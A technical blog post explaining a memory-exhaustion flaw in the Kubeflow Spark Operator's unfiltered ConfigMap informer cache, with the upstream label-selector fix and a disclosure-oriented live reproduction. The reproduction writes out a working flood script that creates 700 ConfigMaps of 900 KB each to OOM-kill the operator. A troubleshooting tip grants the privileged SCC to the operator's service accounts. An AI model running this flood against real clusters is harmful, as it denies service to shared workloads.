Protect your Kubernetes Operator from OOMKill

If you've ever worked with Kubernetes, you've probably heard of operators, those helpful programs that watch over your cluster and manage complex applications automatically. They are highly effective. But they have a quiet vulnerability that's easy to miss during code review, and it can let any regular user crash your operator completely. While investigating the Spark Operator, we identified the same pattern in several other controller-runtime operators and worked with upstream maintainers to fix them. Let's walk through it.

First, what's an informer cache?

When your operator needs to know about resources in the cluster (like Pods or ConfigMaps), it doesn't query the Kubernetes API every single time. That would be slow and expensive. Instead, it sets up something called an informer.

The informer performs a full LIST operation of every matching object at startup, then opens a persistent WATCH connection to receive changes in real time. The informer deserializes every object it finds into a full Go struct and stores it in an in-memory cache. Think of it as a live subscriber that keeps a local copy of that data.

Here's the catch: if you set up an informer without filters, it caches every single object of that type across the entire cluster, as illustrated in Figure 1.

Informer Cache Concept — Figure 1: Informer cache mechanism caching all cluster resources indiscriminately when no filters are applied.
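To make the LIST-then-WATCH behavior concrete, here is a toy model in plain Go. It is not client-go: the object, event, and store types are hypothetical stand-ins, and the sketch only shows how an unfiltered cache ends up holding whatever any tenant creates.

```go
package main

import "fmt"

// object is a hypothetical stand-in for a Kubernetes resource.
type object struct {
	Namespace, Name string
	Payload         []byte
}

// event mimics a WATCH notification: "ADDED", "MODIFIED", or "DELETED".
type event struct {
	Type string
	Obj  object
}

// store is the in-memory cache, keyed by namespace/name.
type store map[string]object

func key(o object) string { return o.Namespace + "/" + o.Name }

// list seeds the cache with every object returned by the initial LIST.
func (s store) list(objs []object) {
	for _, o := range objs {
		s[key(o)] = o
	}
}

// apply folds one WATCH event into the cache.
func (s store) apply(e event) {
	switch e.Type {
	case "ADDED", "MODIFIED":
		s[key(e.Obj)] = e.Obj
	case "DELETED":
		delete(s, key(e.Obj))
	}
}

// cachedBytes sums the payload bytes currently held in memory.
func (s store) cachedBytes() int {
	total := 0
	for _, o := range s {
		total += len(o.Payload)
	}
	return total
}

func main() {
	s := store{}
	s.list([]object{{"team-a", "app-config", make([]byte, 100)}})
	// With no filter, a ConfigMap created by any tenant lands in the cache.
	s.apply(event{"ADDED", object{"team-b", "big-blob", make([]byte, 900_000)}})
	fmt.Println(len(s), s.cachedBytes()) // prints: 2 900100
}
```

The cache grows with every ADDED event, regardless of who created the object. Nothing in this loop asks whether the operator actually needs it.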

The vulnerability: An unfiltered cache

In the Kubeflow Spark Operator, the cache was configured like this:

ByObject: map[client.Object]cache.ByObject{
    // Pods: only those carrying the operator's label are cached.
    &corev1.Pod{}: {
        Label: labels.SelectorFromSet(labels.Set{
            "sparkoperator.k8s.io/launched-by-spark-operator": "true",
        }),
    },
    // ConfigMaps: empty configuration, so ALL ConfigMaps in the cluster are cached.
    &corev1.ConfigMap{}: {},
}

The operator protected pods with a label filter, but ConfigMaps were left unfiltered. The empty {} configuration directs the informer to cache all objects.

How an attacker exploits this

Here's the scary part: an attacker does not need special permissions to execute this exploit. Any user with the edit ClusterRole (the standard role granted to developers and data scientists in multi-tenant clusters) can create ConfigMaps. Creating enough large ones is all it takes to trash your operator.

The progression of this memory saturation and subsequent pod failure is mapped out in Figure 2.

OOMKill Attack Flow — Figure 2: Out-of-memory termination sequence caused by memory growth from unfiltered resource deserialization.

The math is simple: 700 ConfigMaps at 900 KB each equals approximately 630 MB of raw data. However, the informer does not keep the raw serialized bytes it receives from the API server. Instead, it deserializes each object into a typed Go struct (corev1.ConfigMap) with map headers, string headers, and pointer indirection, so the real memory footprint exceeds the raw data size. With a 512 MiB memory limit on the operator, the process is OOM-killed. The pod restarts, attempts to relist everything, crashes again, and enters CrashLoopBackOff. Your operator is now completely out of commission: a denial-of-service condition that requires no special tools.
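The arithmetic above can be checked with a few lines of Go. This is only a back-of-the-envelope sketch: it uses decimal kilobytes as the text does, and it ignores the per-object Go overhead, so the real footprint would be higher than the number it prints.

```go
package main

import "fmt"

const (
	configMaps   = 700
	payloadBytes = 900 * 1000        // 900 KB per ConfigMap, decimal units as in the text
	limitBytes   = 512 * 1024 * 1024 // 512 MiB container memory limit
)

// rawBytes returns the total payload size before any Go object overhead.
func rawBytes(count, size int64) int64 { return count * size }

func main() {
	raw := rawBytes(configMaps, payloadBytes)
	fmt.Printf("raw payload: %d bytes (%.0f MB)\n", raw, float64(raw)/1e6)
	fmt.Printf("limit:       %d bytes (%.0f MB)\n", int64(limitBytes), float64(limitBytes)/1e6)
	fmt.Printf("over limit:  %v\n", raw > limitBytes)
}
```

The raw payload comes to 630,000,000 bytes against a limit of 536,870,912 bytes, so the limit is exceeded before deserialization overhead is even counted.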

The solution

Resolving this memory exhaustion vulnerability requires a systematic engineering approach. Figure 3 outlines the four primary phases of the cache remediation process.

Fix Steps Overview — Figure 3: Architectural phases of the step-by-step informer cache remediation sequence.

Step 1: Filter the cache

This solution uses the same pattern that the operator already applies to pods. The updated configuration instructs the informer to cache only the objects that contain a specific label.

// Before (vulnerable) — caches EVERY ConfigMap in the cluster:
&corev1.ConfigMap{}: {},
// After (fixed) — only caches ConfigMaps your operator created:
&corev1.ConfigMap{}: {
    Label: labels.SelectorFromSet(labels.Set{
        "sparkoperator.k8s.io/created-by-spark-operator": "true",
    }),
},

By refining the cache scope, the informer selectively isolates objects in memory, as diagrammed in Figure 4.

Figure 4: The label filter in action, where only operator-owned ConfigMaps enter memory.

Now when an attacker floods the cluster with unlabeled ConfigMaps, the informer ignores them. These resources never enter your operator's memory footprint.
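The matching rule behind a selector built from a label set is simple: every key/value pair in the selector must be present on the object. The sketch below re-implements that rule in plain Go for illustration. The matches function and the "app" label are hypothetical; in the real informer the selector is sent along with the LIST and WATCH requests, so non-matching objects are filtered out by the API server and never reach the operator.

```go
package main

import "fmt"

// matches reports whether every key/value pair in selector is present in
// objLabels. An empty selector matches everything, which mirrors the
// unfiltered {} entry.
func matches(selector, objLabels map[string]string) bool {
	for k, want := range selector {
		if got, ok := objLabels[k]; !ok || got != want {
			return false
		}
	}
	return true
}

func main() {
	selector := map[string]string{"sparkoperator.k8s.io/created-by-spark-operator": "true"}

	owned := map[string]string{
		"sparkoperator.k8s.io/created-by-spark-operator": "true",
		"app": "spark-pi", // hypothetical extra label
	}
	var flooded map[string]string // attacker ConfigMap with no labels

	fmt.Println(matches(selector, owned))   // true
	fmt.Println(matches(selector, flooded)) // false
	fmt.Println(matches(nil, flooded))      // true: no selector, everything is cached
}
```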

Step 2: Label your own ConfigMaps

The operator creates Prometheus monitoring ConfigMaps for Spark applications. Because the cache now filters by label, those ConfigMaps also require the label; otherwise, your operator cannot detect its own objects.

return &corev1.ConfigMap{
    ObjectMeta: metav1.ObjectMeta{
        Name:      prometheusConfigMapName,
        Namespace: app.Namespace,
        Labels: map[string]string{
            "sparkoperator.k8s.io/created-by-spark-operator": "true",
        },
    },
    Data: configMapData,
}

Step 3: Handle the resource upgrade path

This scenario is where most engineers encounter issues. When you deploy the patched operator on a cluster that already has ConfigMaps from the old version, those existing objects lack the label, so the filtered cache cannot see them. The result is an awkward pair of responses:

client.Get() returns NotFound (because the cache cannot detect the unlabeled object).
client.Create() returns AlreadyExists because the resource is already present in the API server.

To bypass this limitation, you can apply a merge patch. A merge patch does not require a resourceVersion field like a standard update operation does, and it applies the label without overwriting other configurations on the object:

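// errors is k8s.io/apimachinery/pkg/api/errors.
if errors.IsAlreadyExists(createErr) {
    // base carries only the identity of the existing object.
    base := &corev1.ConfigMap{
        ObjectMeta: metav1.ObjectMeta{
            Name:      configMap.Name,
            Namespace: configMap.Namespace,
        },
    }
    desired := base.DeepCopy()
    desired.Labels = map[string]string{
        "sparkoperator.k8s.io/created-by-spark-operator": "true",
    }
    desired.Data = configMap.Data
    // MergeFrom diffs desired against base, so the patch carries only labels and data.
    return c.Patch(ctx, desired, client.MergeFrom(base))
}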

This fallback mechanism handles resource reconciliation during deployment transitions without breaking state, as detailed in Figure 5.

Upgrade-path — Figure 5: Logical execution flow for evaluating and patching unlabeled pre-existing resources during upgrades.
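To see why a merge patch leaves the rest of the object alone, it helps to apply one by hand. The sketch below implements the JSON merge patch rules (RFC 7396) in plain Go and applies a patch of the shape described above to a pre-existing object. The mergePatch helper, the annotation, and the data keys are all hypothetical; the real merge happens inside the API server.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// mergePatch applies an RFC 7396 JSON merge patch to target: objects merge
// key by key, null deletes a key, and any other value replaces the old one.
func mergePatch(target, patch map[string]any) map[string]any {
	if target == nil {
		target = map[string]any{}
	}
	for k, v := range patch {
		switch pv := v.(type) {
		case nil:
			delete(target, k)
		case map[string]any:
			child, _ := target[k].(map[string]any)
			target[k] = mergePatch(child, pv)
		default:
			target[k] = pv
		}
	}
	return target
}

func main() {
	// Pre-existing ConfigMap from the old operator version (hypothetical content).
	existing := []byte(`{"metadata":{"name":"prometheus-config","annotations":{"team":"data"}},"data":{"old":"1"}}`)
	// Patch body containing only the fields that changed relative to the base.
	patch := []byte(`{"metadata":{"labels":{"sparkoperator.k8s.io/created-by-spark-operator":"true"}},"data":{"prometheus.yaml":"rules"}}`)

	var obj, p map[string]any
	if err := json.Unmarshal(existing, &obj); err != nil {
		panic(err)
	}
	if err := json.Unmarshal(patch, &p); err != nil {
		panic(err)
	}
	out, err := json.Marshal(mergePatch(obj, p))
	if err != nil {
		panic(err)
	}
	fmt.Println(string(out))
}
```

The name and the annotation survive, and the label is added. Note that keys the patch does not mention are kept as well, so a stale data key such as "old" would remain unless the patch sets it to null.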

Step 4: Propagate labels during resource updates

For ConfigMaps that are already visible in the cache, ensure the operator writes the label back during an update. This practice guards against edge cases where a label might be missing:

cm.Data = configMap.Data
if cm.Labels == nil {
    cm.Labels = map[string]string{}
}
cm.Labels["sparkoperator.k8s.io/created-by-spark-operator"] = "true"
return c.Update(ctx, cm)
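The nil check in that snippet is not decoration: writing to a nil map panics in Go, and an object that has never had labels carries a nil Labels map. A minimal sketch of the same guard as a reusable helper follows; ensureOwnerLabel is a hypothetical name, not a function from the operator.

```go
package main

import "fmt"

const ownerLabel = "sparkoperator.k8s.io/created-by-spark-operator"

// ensureOwnerLabel returns labels with the operator label set, allocating
// the map first because writing to a nil map panics in Go.
func ensureOwnerLabel(labels map[string]string) map[string]string {
	if labels == nil {
		labels = map[string]string{}
	}
	labels[ownerLabel] = "true"
	return labels
}

func main() {
	var none map[string]string // object that had no labels at all
	fmt.Println(ensureOwnerLabel(none))
	fmt.Println(ensureOwnerLabel(map[string]string{"app": "spark-pi"}))
}
```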

Proving it on a real cluster

While unit tests are great, observing system behavior directly on a live cluster provides definitive validation. Here's the full walkthrough.

The test consists of two phases: first, you confirm the vulnerability with the unpatched operator, and then you confirm the fix with the patched operator. The 700 flooded ConfigMaps remain in the cluster between phases, allowing you to test the operator against a realistic worst-case scenario. The sequential verification lifecycle across your environment is mapped in Figure 6.

OpenShift Cluster Test Flow — Figure 6: Live validation lifecycle for evaluating operator performance against multi-tenant resource flooding.

Step 1: Log in to the cluster and verify access

oc login <your-cluster-url> --username cluster-admin --password <password>
oc whoami

You need cluster-admin privileges to deploy the operator and create namespaces. If oc whoami returns your username, the authentication is successful.

Step 2: Deploy the unpatched operator

Deploy the stock operator image (quay.io/opendatahub/spark-operator:v2.4.0) using Kustomize manifests. This is the vulnerable version with no label filter on the ConfigMap cache.

oc apply -k config/default/ --server-side=true
oc get pods -n spark-operator -w

The --server-side=true flag uses server-side apply, which avoids the annotation size limit that client-side apply can hit with large custom resource definitions. Wait until the pod shows Running before proceeding.

Step 3: Record the operator's baseline memory usage

Before flooding the cluster, capture the operator's normal memory usage to establish a healthy baseline.

oc adm top pod -n spark-operator

NAME                                        CPU(cores)   MEMORY(bytes)
spark-operator-controller-bb745cb-qj6vj     1m           36Mi

Note the approximately 36 MiB value. That's your healthy reference point.

Step 4: Create 10 test namespaces

for i in $(seq 1 10); do oc create ns oom-test-$i; done

This loop runs oc create ns oom-test-1 through oc create ns oom-test-10. Spreading ConfigMaps across multiple namespaces simulates a real multi-tenant cluster where different teams create their own resources.

Step 5: Generate the text-based attack payload

dd if=/dev/urandom bs=1024 count=900 2>/dev/null | base64 > /tmp/payload.txt
truncate -s 921600 /tmp/payload.txt
ls -lh /tmp/payload.txt

What's happening here: The dd utility reads 900 KiB (921,600 bytes) of random data from /dev/urandom. The base64 command converts it into plain text, because the data field of a ConfigMap must hold UTF-8 text. Because base64 encoding inflates the size by approximately 33%, truncate then trims the file back to exactly 921,600 bytes, which keeps each ConfigMap under the 1 MiB size limit.
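The sizes involved in the payload step can be verified with Go's standard base64 package. This is a sketch of the arithmetic only: it does not generate the file, and it ignores the line breaks that the base64 command-line tool inserts, which add slightly more bytes before truncation.

```go
package main

import (
	"encoding/base64"
	"fmt"
)

const (
	rawBytes     = 900 * 1024  // dd bs=1024 count=900
	truncatedTo  = 921600      // truncate -s 921600
	configMapMax = 1024 * 1024 // 1 MiB ConfigMap size limit
)

// encodedLen returns the padded base64 length for n input bytes.
func encodedLen(n int) int { return base64.StdEncoding.EncodedLen(n) }

func main() {
	encoded := encodedLen(rawBytes)
	fmt.Println("raw bytes:     ", rawBytes)
	fmt.Println("base64 bytes:  ", encoded)
	fmt.Printf("inflation:      %.2fx\n", float64(encoded)/float64(rawBytes))
	fmt.Println("after truncate:", truncatedTo)
	fmt.Println("under 1 MiB:   ", truncatedTo < configMapMax)
}
```

The encoded text is 1,228,800 bytes, which would exceed the 1 MiB limit on its own. That is why the truncate step is needed before the file can be stored in a ConfigMap.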

Step 6: Flood 700 ConfigMaps

for i in $(seq 1 700); do
  ns="oom-test-$(( (i % 10) + 1 ))"
  oc create configmap "oom-payload-$i" --from-file=data=/tmp/payload.txt -n "$ns" 2>/dev/null &
  [ $((i % 5)) -eq 0 ] && wait
done
wait

The modulo operation (% 10) distributes the ConfigMaps evenly across the 10 namespaces. The & operator runs each creation command in the background to increase execution speed, and the wait command every five iterations prevents the process from overwhelming the API server. Verify that the creation succeeded:

oc get configmaps -A | grep oom-payload | wc -l
# Expected: 700
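If you want to confirm that the modulo expression in the flood loop really spreads the objects evenly, the same mapping can be reproduced in Go. The distribute function is a hypothetical helper that mirrors the shell arithmetic; it does not talk to a cluster.

```go
package main

import "fmt"

// distribute mirrors the shell loop: item i goes to namespace (i % n) + 1.
func distribute(items, namespaces int) map[string]int {
	counts := make(map[string]int, namespaces)
	for i := 1; i <= items; i++ {
		ns := fmt.Sprintf("oom-test-%d", (i%namespaces)+1)
		counts[ns]++
	}
	return counts
}

func main() {
	counts := distribute(700, 10)
	fmt.Println(len(counts), counts["oom-test-1"], counts["oom-test-10"]) // prints: 10 70 70
}
```

Each of the 10 namespaces receives 70 ConfigMaps, so a per-namespace count is a quick way to spot creations that failed silently because of the 2>/dev/null redirect.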

Step 7: Watch the operator termination

oc get pods -n spark-operator -w

Within 30 to 60 seconds, the terminal displays the following status changes:

spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          5   16h
spark-operator-controller-bb745cb-qj6vj   0/1   CrashLoopBackOff   5   16h
spark-operator-controller-bb745cb-qj6vj   0/1   OOMKilled          6   16h

Confirm the error state by running the following command:

oc describe pod -n spark-operator -l app.kubernetes.io/component=controller | grep -A3 "Last State"

Last State:  Terminated
Reason:    OOMKilled
Exit Code: 137

Vulnerability confirmed. The unfiltered informer tried to cache roughly 630 MB of ConfigMap data and exceeded the 512 MiB memory limit, which caused Kubernetes to terminate the process.

Step 8: Build and deploy the patched operator image

Clone the upstream fix branch, build your own image, and deploy it. The 700 flooded ConfigMaps are still sitting in the cluster, so the patched operator must withstand the same load.

# Build from the upstream fix branch (kubeflow/spark-operator#2878)
git clone https://github.com/kubeflow/spark-operator.git
cd spark-operator && git checkout <fix-branch>
docker buildx build --platform linux/amd64 -t <your-registry>/spark-operator-controller:oom-fix --push .

The --platform linux/amd64 flag is required if you are building the image on Apple Silicon hardware; without it, the container image will not run on an x86 cluster. After pushing the image, update the running deployment:

export IMAGE=<your-registry>/spark-operator-controller:oom-fix
oc set image deployment/spark-operator-controller controller=$IMAGE -n spark-operator
oc rollout status deployment/spark-operator-controller -n spark-operator

Replace <your-registry> with your own container registry (for example, quay.io/your-username) and <fix-branch> with the branch name from the upstream pull request. The oc rollout status command blocks until the new pod is fully operational, indicating exactly when it is ready for testing.

Step 9: Verify the fix holds

oc get pods -n spark-operator

NAME                                        READY   STATUS    RESTARTS   AGE
spark-operator-controller-cdb487b68-sdfnn   1/1     Running   0          71s

oc adm top pod -n spark-operator

NAME                                        CPU(cores)   MEMORY(bytes)
spark-operator-controller-cdb487b68-sdfnn   1m           14Mi

Memory usage is 14 MiB, below the 36 MiB baseline recorded before the flood, and the pod shows zero restarts. The label filter is doing its job. All 700 unlabeled ConfigMaps remain invisible to the informer cache.

Metric	Unpatched	Patched
Status	`OOMKilled` → `CrashLoopBackOff`	`Running`, 0 restarts
Memory	Exceeded 512 MiB (exit code 137)	14 MiB, flat
700 flooded ConfigMaps	All cached	Ignored

Step 10: Cleanup

for i in $(seq 1 10); do oc delete ns oom-test-$i --wait=false; done
oc delete -k config/default/
rm -f /tmp/payload.txt

The --wait=false flag kicks off namespace deletion in the background without blocking your terminal.

Common issues and troubleshooting

Use the following troubleshooting steps to resolve configuration and environment issues encountered during deployment.

SCC errors on pod startup

OpenShift's Security Context Constraints are stricter than vanilla Kubernetes. If pods fail to start due to an SCC validation error, grant the privileged SCC to the operator's service accounts:

oc adm policy add-scc-to-user privileged -z spark-operator-controller -n spark-operator
oc adm policy add-scc-to-user privileged -z spark-operator-webhook -n spark-operator

Architecture mismatch (Apple Silicon)

If you build the image on an Apple Silicon Mac and the target cluster uses an x86 architecture, the deployment returns a no image found for architecture "amd64" error. To resolve this issue, rebuild the image using the following command:

docker buildx build --platform linux/amd64 -t $IMAGE --push .

Image pull errors from quay.io

New quay.io repositories are private by default. Navigate to your repository's Settings page and select Make Public before the cluster attempts to pull the image.

Operator does not terminate with an OOMKilled error

If the operator is scoped to specific namespaces using the --namespaces flag in the deployment, it will not watch the oom-test-* namespaces and will not cache the flooded ConfigMaps. Check the deployment arguments: An empty --namespaces= flag indicates a cluster-wide scope, which this test requires.

Tips and best practices

Implement the following design patterns and testing strategies to safeguard your operators from cache-based memory exhaustion.

Always use label selectors on informer caches. If your operator creates ConfigMaps, Services, or other common objects, add a label and filter the cache by that label.
Audit all entries in ByObject. Any entry with {}, which indicates an empty configuration, represents an unfiltered cluster-wide informer. Ask: Does this operator require a cache for every object of this type?
Use a merge patch for resource upgrade paths. When you add label filtering to an existing deployment, pre-existing objects will not contain the label. Use client.Patch with MergeFrom to add labels without requiring a resourceVersion field.
Test with realistic data volumes. The attack requires only about 700 ConfigMaps at 900 KB each, which is well within what a standard user can create. Test your deployments at this scale.

Wrap up

An unfiltered informer cache in a controller-runtime operator introduces a vulnerability to out-of-memory (OOM) terminations via ConfigMap flooding. Mitigating this risk involves the following steps:

Add a label selector to the ByObject cache configuration.
Label operator-created ConfigMaps.
Manage the resource upgrade path using a merge patch for pre-existing objects.
Propagate labels during resource updates.

This vulnerability is not a theoretical problem. After resolving the issue in the Spark Operator, we audited other controller-runtime operators and discovered the same pattern. The upstream fix landed in kubeflow/spark-operator#2878. This configuration pattern is systemic across the controller-runtime ecosystem because ByObject defaults to caching all objects when no selector is specified. The vulnerability applies to any high-volume resource type, including ConfigMaps, Secrets, Services, and Pods. If you maintain a controller-runtime operator, audit your cache configuration to protect your cluster.

Learn more

Explore the following resources for more details on cache configuration, upstream fixes, and platform security:

Kubeflow Spark Operator: The upstream project.
kubeflow/spark-operator#2878: The upstream fix for the ConfigMap cache vulnerability.
controller-runtime Cache Options: Official documentation for cache configuration.
Kubernetes Informers: Documentation explaining the watch and cache mechanism.
OpenShift Security Context Constraints: Understanding SCC on OpenShift.